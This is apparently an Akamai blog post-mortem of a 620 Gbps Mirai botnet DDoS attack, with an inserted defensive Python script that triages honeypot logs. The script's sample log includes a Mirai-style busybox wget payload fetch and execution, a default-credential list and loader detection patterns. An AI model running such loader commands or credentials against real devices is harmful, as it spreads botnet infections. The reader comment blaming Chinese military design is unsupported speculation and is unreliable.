The Akamai Blog

620+ Gbps Attack - Post Mortem

On Tuesday, September 20, Akamai successfully defended against a DDoS attack exceeding 620 Gbps, nearly double that of the previous peak attack on our platform.

That attack and the recent release of the Mirai source code have generated a lot of interest in, and speculation about, the role of IoT devices in DDoS attacks. For several months, Akamai researchers have been looking into the code that is now known as Mirai. Much of that research was based on reverse engineering of the binary prior to the actual source code being released.

Based on that investigation and what we know about the September 20 attack, we can confirm that the Mirai botnet was a major participant. At least one other botnet may also have been involved, but we cannot confirm that the attacks were coordinated.

We have been tracking Mirai for some time, and on August 8 published a Threat Advisory to customers on the malware we then called Kaiten (and the world now knows as Mirai). The advisory detailed our examination of a known-vulnerable device, placed on a public IP address, that we used to analyze trends in brute-force login attacks on the Internet. The device exposed listening services including Telnet, SSH, HTTP, and SMTP, among others. The first thing we observed was bots logging in with default credentials associated with IoT devices; next we saw those sessions issue commands that attempted to load the malware onto the device. In other words, within hours we were watching the Kaiten/Mirai botnet grow. Within 12 days we had made the following observations:

  • Roughly 100,000 total login attempts were made from more than 1,800 IPs

  • The top source countries were China (64%), Colombia (13%), South Korea (6%), and Vietnam (6%)

  • The most attacked protocols were SSH (57%) and Telnet (42%)

  • The top usernames were root (75%), admin (10%), shell (6%), and sh (6%)

  • The most common login attempts used credentials associated with Internet-connected surveillance cameras and their DVR units
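The brute-force and malware-loading pattern described above, as an added example that is not Akamai's code: a Python script that parses a few constructed log lines (OpenSSH auth-log style plus an assumed Telnet honeypot format), produces the kind of counts listed above (attempt total, distinct source IPs, protocol share, top usernames), and flags Telnet sessions where a weak IoT credential succeeded and was followed by payload-fetch commands. The Telnet log format, the weak-credential list, the loader markers and every address and URL in the sample are assumptions for illustration, not observed data.

```python
"""Triage of brute-force login attempts against an exposed device.

Added example, not Akamai's code. The log lines below are CONSTRUCTED;
the Telnet honeypot format, the weak-credential list and the loader
markers are assumptions chosen to illustrate the pattern in the post.
"""
import re
from collections import Counter

# Constructed sample log (documentation addresses, made-up sessions).
SAMPLE_LOG = """\
Sep 20 01:02:03 honeypot sshd[311]: Failed password for root from 203.0.113.5 port 51022 ssh2
Sep 20 01:02:04 honeypot sshd[312]: Failed password for invalid user admin from 203.0.113.5 port 51023 ssh2
Sep 20 01:02:09 honeypot sshd[315]: Failed password for root from 198.51.100.7 port 40011 ssh2
Sep 20 01:03:10 honeypot telnetd: login attempt user=root pass=admin from 192.0.2.44 result=ok session=7
Sep 20 01:03:11 honeypot telnetd: cmd session=7 from 192.0.2.44 text=/bin/busybox wget http://203.0.113.99/bins/bot.arm -O /tmp/.x
Sep 20 01:03:12 honeypot telnetd: cmd session=7 from 192.0.2.44 text=chmod +x /tmp/.x; /tmp/.x
Sep 20 01:04:00 honeypot telnetd: login attempt user=admin pass=1234 from 192.0.2.45 result=fail session=8
Sep 20 01:04:02 honeypot telnetd: login attempt user=sh pass=password from 192.0.2.45 result=fail session=9
Sep 20 01:05:00 honeypot sshd[320]: Failed password for invalid user shell from 192.0.2.46 port 38000 ssh2
"""

# OpenSSH's real "Failed password" message shape; the Telnet shapes are assumed.
SSH_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2")
TELNET_LOGIN_RE = re.compile(
    r"telnetd: login attempt user=(?P<user>\S+) pass=(?P<pw>\S*) "
    r"from (?P<ip>[\d.]+) result=(?P<result>\w+) session=(?P<sid>\d+)")
TELNET_CMD_RE = re.compile(
    r"telnetd: cmd session=(?P<sid>\d+) from (?P<ip>[\d.]+) text=(?P<cmd>.*)$")
URL_RE = re.compile(r"(?:https?|tftp)://\S+")

# Assumed weak/default credentials: the post names admin, password and
# 1234; the root pairs are added here as an assumption.
WEAK_CREDS = {("root", "root"), ("root", "admin"), ("root", "1234"),
              ("admin", "admin"), ("admin", "password"), ("admin", "1234")}

# Shell fragments typical of a post-login payload fetch (assumption).
LOADER_MARKERS = ("wget ", "tftp ", "busybox", "chmod +x", "/tmp/")


def parse_log(text):
    """Split raw lines into login attempts and Telnet session commands."""
    attempts, commands = [], []
    for line in text.splitlines():
        m = SSH_RE.search(line)
        if m:
            attempts.append(dict(proto="ssh", user=m["user"], pw=None,
                                 ip=m["ip"], ok=False, sid=None))
            continue
        m = TELNET_LOGIN_RE.search(line)
        if m:
            attempts.append(dict(proto="telnet", user=m["user"], pw=m["pw"],
                                 ip=m["ip"], ok=m["result"] == "ok", sid=m["sid"]))
            continue
        m = TELNET_CMD_RE.search(line)
        if m:
            commands.append(dict(sid=m["sid"], ip=m["ip"], cmd=m["cmd"]))
    return attempts, commands


def summarize(attempts):
    """Counts in the shape of the observations above."""
    n = len(attempts)
    proto = Counter(a["proto"] for a in attempts)
    users = Counter(a["user"] for a in attempts)
    return {
        "attempts": n,
        "unique_ips": len({a["ip"] for a in attempts}),
        "protocol_pct": {p: round(100 * c / n) for p, c in proto.items()},
        "top_users": users.most_common(4),
    }


def flag_loader_sessions(attempts, commands):
    """Telnet sessions that logged in with a weak credential and then ran
    loader-like commands; returns {session_id: {ip, commands, urls}}."""
    weak_ok = {a["sid"] for a in attempts
               if a["proto"] == "telnet" and a["ok"]
               and (a["user"], a["pw"]) in WEAK_CREDS}
    flagged = {}
    for c in commands:
        if c["sid"] in weak_ok and any(mk in c["cmd"] for mk in LOADER_MARKERS):
            entry = flagged.setdefault(c["sid"], {"ip": c["ip"], "commands": [], "urls": []})
            entry["commands"].append(c["cmd"])
            entry["urls"].extend(URL_RE.findall(c["cmd"]))  # payload hosts worth blocking
    return flagged


if __name__ == "__main__":
    att, cmds = parse_log(SAMPLE_LOG)
    print(summarize(att))
    for sid, info in flag_loader_sessions(att, cmds).items():
        print(f"session {sid} from {info['ip']} fetched {info['urls']}")
```

The session-level check is the useful part: a single failed root login is noise, but a successful login with a factory credential followed within seconds by a `wget`/`tftp` fetch into `/tmp` and a `chmod +x` is the loader stage the post describes, and the extracted URL is the hosting server to block or report.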

After the massive attacks of September 20, the Mirai botnet and other botnets continued to attack in the days that followed. Here's a sampling of where some of the attack traffic originated:

Tuesday (9/20)

GEO (Percent of traffic)

  • APJ (22%)
  • EMEA (47%)
  • NA (31%)

Thursday's (9/22) attacks had different breakdowns:

Attack 1 (started Sep 22)

GEO (Percent of traffic)

  • APJ (15%)
  • EMEA (51%)
  • NA (34%)

Attack 2 (started Sep 22)

GEO (Percent of traffic)

  • APJ (26%)
  • EMEA (46%)
  • NA (28%)

While this was the largest attack Akamai has recorded to date, other factors set it apart from a "standard DDoS." Most significantly, the attack was generated by a botnet composed primarily of "Internet of Things" (IoT) devices. The majority of these devices were identified as security cameras and DVRs deployed in "Small Office/Home Office" (SOHO) settings. We've confirmed that many of them use either easily guessable usernames and passwords (admin, password, 1234) or the default passwords configured on the devices at the factory. Additionally, a substantial share of the attack traffic came directly from the bots to the target, rather than being reflected and amplified off third-party servers, as in recent large attacks that abused open NTP servers and DNS resolvers.

We are continuing to research the particulars of this attack as well as our own security posture, and we'll share significant details as they become available.

Thanks to Martin Mckeay (@mckeay) and Danny Wasserman for contributing research to this post.


As a developer of websites for local businesses in Brooklyn, should I be concerned about this? What steps can I take to protect my clients' sites from DDoS?

Thanks for the comment and question, Rachel. I see candidates for DDoS mitigation services (you can find some here: https://www.akamai.com/us/en/solutions/products/cloud-security/) on your client list at http://brooklynupdates.com/clients/. I am probably biased when I say that DDoS mitigation is best served from the "Cloud", but I've noticed in the past year that more and more industry pundits and analysts (Gartner included) seem to agree. Beyond protecting your clients' sites, there are things that every good netizen can and should do to update the "things" in their Internet of Things. For details on that, check out our Mirai/Kaiten threat advisory.

This is the most fascinating bot attack in years, and it is transcendent. I sense that it is a test-run of a much larger attack that we will face in the event of a kinetic conflict with other world powers (I write from the USA).

Think about it. 64% of the attacks were from bot-sites directly linked to IPs assigned to China-based servers. Hmmmm. A few were spread around to Colombia and others for whatever reasons.

But consider how many millions of networked devices we have connected in the USA. Of them, how many came from China? :)

And China coordinates manufacturing through the People's Army, which absolutely designed the devices sold into the USA as potential trojans in the event of war.

Winning "the war" without a shot being fired is classic Chinese military doctrine. The IoT is our Achilles heel, and the IoT is their Trojan Horse.

But boy didn't we get some great bargains on those cheap Chinese routers, hubs, DVRs and cameras! And to imagine that they were built in factories designed by American engineers, co-owned by American businesses and with money loaned from American banks.

Thanks for engaging, Jerry. I agree that this attack is the most interesting in years, and also that it represents a seismic shift in the threat landscape. WRT attribution, I am not sure I am of the same mind as you. Generally speaking, our research shows IoT devices have security weaknesses regardless of manufacturing origin.